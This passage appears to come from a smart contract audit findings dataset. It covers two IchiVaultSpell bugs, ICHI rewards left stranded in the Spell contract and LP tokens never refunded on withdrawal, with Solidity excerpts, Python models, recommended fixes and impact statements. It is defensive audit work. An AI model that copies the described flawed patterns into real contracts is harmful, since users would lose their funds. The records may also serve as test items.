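    """Reward owed for `amount` LP staked between two accIchiPerShare
    checkpoints, mirroring wIchiFarm.burn(): enIchi - stIchi, with
    stIchi rounded up (divCeil)."""
    st_ichi = -(-st_per_share * amount // WAD)  # ceiling division
    en_ichi = en_per_share * amount // WAD
    return max(en_ichi - st_ichi, 0)

# Hypothetical position: 100e18 LP staked at accIchiPerShare = 1e18,
# burned later when accIchiPerShare = 3e18.
owed = pending_rewards(1 * WAD, 3 * WAD, 100 * WAD)
assert owed == 200 * WAD  # 200 ICHI are transferred to the Spell on burn()

# openPositionFarm() burns and re-mints but never calls doRefund(ICHI),
# so the Spell's balance grows while the user's stays at zero.
spell_balance, user_balance = 0, 0
spell_balance += owed  # burn() pays the Spell contract, not the user
# missing step: user_balance += spell_balance; spell_balance = 0
assert user_balance == 0 and spell_balance == 200 * WAD
```

Every additional top-up repeats this burn/mint cycle, so the stranded balance keeps growing until anyone calls `closePositionFarm()` and sweeps it via `doRefund(ICHI)`.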
In the `openPositionFarm()` function, in the section that deals with withdrawing existing collateral, add a line that claims the ICHI rewards for the calling user.\\n```\\nif (collSize > 0) {\\n (uint256 decodedPid, ) = wIchiFarm.decodeId(collId);\\n if (farmingPid != decodedPid) revert INCORRECT_PID(farmingPid);\\n if (posCollToken != address(wIchiFarm))\\n revert INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wIchiFarm.burn(collId, collSize);\\n// Add the line below\\n doRefund(ICHI);\\n}\\n```\\n
Users who farm their Ichi LP tokens for ICHI rewards can permanently lose their rewards.
```\\nfunction mint(uint256 pid, uint256 amount)\\n external\\n nonReentrant\\n returns (uint256)\\n{\\n address lpToken = ichiFarm.lpToken(pid);\\n IERC20Upgradeable(lpToken).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n if (\\n IERC20Upgradeable(lpToken).allowance(\\n address(this),\\n address(ichiFarm)\\n ) != type(uint256).max\\n ) {\\n // We only need to do this once per pool, as LP token's allowance won't decrease if it's -1.\\n IERC20Upgradeable(lpToken).safeApprove(\\n address(ichiFarm),\\n type(uint256).max\\n );\\n }\\n ichiFarm.deposit(pid, amount, address(this));\\n // @ok if accIchiPerShare is always changing, so how does this work?\\n // it's basically just saving the accIchiPerShare at staking time, so when you unstake, it can calculate the difference\\n // really fucking smart actually\\n (uint256 ichiPerShare, , ) = ichiFarm.poolInfo(pid);\\n uint256 id = encodeId(pid, ichiPerShare);\\n _mint(msg.sender, id, amount, "");\\n return id;\\n}\\n```\\n
LP tokens are not sent back to withdrawing user
high
When users withdraw their assets from `IchiVaultSpell.sol`, the function unwinds their position and sends them back their assets, but it never sends back the LP tokens they asked to keep (`amountLpWithdraw`), leaving those tokens stuck in the Spell contract.\\nWhen a user withdraws from `IchiVaultSpell.sol`, they either call `closePosition()` or `closePositionFarm()`, both of which make an internal call to `withdrawInternal()`.\\nThe following arguments are passed to the function:\\nstrategyId: an index into the `strategies` array, which specifies the Ichi vault in question\\ncollToken: the underlying token, which is withdrawn from Compound\\namountShareWithdraw: the number of underlying tokens to withdraw from Compound\\nborrowToken: the token that was borrowed from Compound to create the position, one of the underlying tokens of the vault\\namountRepay: the amount of the borrow token to repay to Compound\\namountLpWithdraw: the amount of LP tokens to keep as-is, rather than trade back into borrow tokens\\nIn order to accomplish these goals, the contract does the following...\\nRemoves the LP tokens from the ERC1155 holding them as collateral.\\n```\\ndoTakeCollateral(strategies[strategyId].vault, lpTakeAmt);\\n```\\n\\nCalculates the number of LP tokens to withdraw from the vault.\\n```\\nuint256 amtLPToRemove = vault.balanceOf(address(this)) - amountLpWithdraw;\\nvault.withdraw(amtLPToRemove, address(this));\\n```\\n\\nConverts the non-borrowed token that was withdrawn into the borrowed token (not copying the code in, as it's not relevant to this issue).\\nWithdraws the underlying token from Compound.\\n```\\ndoWithdraw(collToken, amountShareWithdraw);\\n```\\n\\nPays back the borrowed token to Compound.\\n```\\ndoRepay(borrowToken, amountRepay);\\n```\\n\\nValidates that this situation does not put us above the maxLTV for our loans.\\n```\\n_validateMaxLTV(strategyId);\\n```\\n\\nSends the remaining borrow tokens that weren't repaid and the withdrawn underlying tokens to the
user.\\n```\\ndoRefund(borrowToken);\\ndoRefund(collToken);\\n```\\n\\nCrucially, the step of sending the remaining LP tokens to the user is skipped, even though the function specifically does the calculations to ensure that `amountLpWithdraw` is held back from being taken out of the vault.
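The held-back LP accounting can be traced with a minimal Python sketch. This is a simplified model of `withdrawInternal()` with hypothetical balances, not the contract's code; it only shows that whatever is subtracted as `amountLpWithdraw` never leaves the Spell contract.

```python
WAD = 10**18

def close_position(vault_balance: int, amount_lp_withdraw: int):
    """Mirror withdrawInternal()'s LP handling: only
    vault_balance - amount_lp_withdraw LP are unwound; the remainder
    stays in the Spell because doRefund(address(vault)) is never called."""
    amt_lp_to_remove = vault_balance - amount_lp_withdraw
    unwound = amt_lp_to_remove              # withdrawn from the Ichi vault
    stuck_in_spell = vault_balance - unwound  # the user's "kept" LP tokens
    return unwound, stuck_in_spell

# Hypothetical: the Spell holds 50e18 LP and the user asks to keep 10e18.
unwound, stuck = close_position(50 * WAD, 10 * WAD)
assert unwound == 40 * WAD
assert stuck == 10 * WAD  # stranded; nothing ever transfers these out
```

With the recommended `doRefund(address(vault))` added after the other refunds, the `stuck` amount would instead be swept to `msg.sender` along with the borrow and collateral tokens.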
Add an additional line to the `withdrawInternal()` function to refund all LP tokens as well:\\n```\\n doRefund(borrowToken);\\n doRefund(collToken);\\n// Add the line below\\n doRefund(address(vault));\\n```\\n
Users who close their positions and choose to keep LP tokens (rather than unwinding the position for the constituent tokens) will have their LP tokens stuck permanently in the IchiVaultSpell contract.
```\\ndoTakeCollateral(strategies[strategyId].vault, lpTakeAmt);\\n```\\n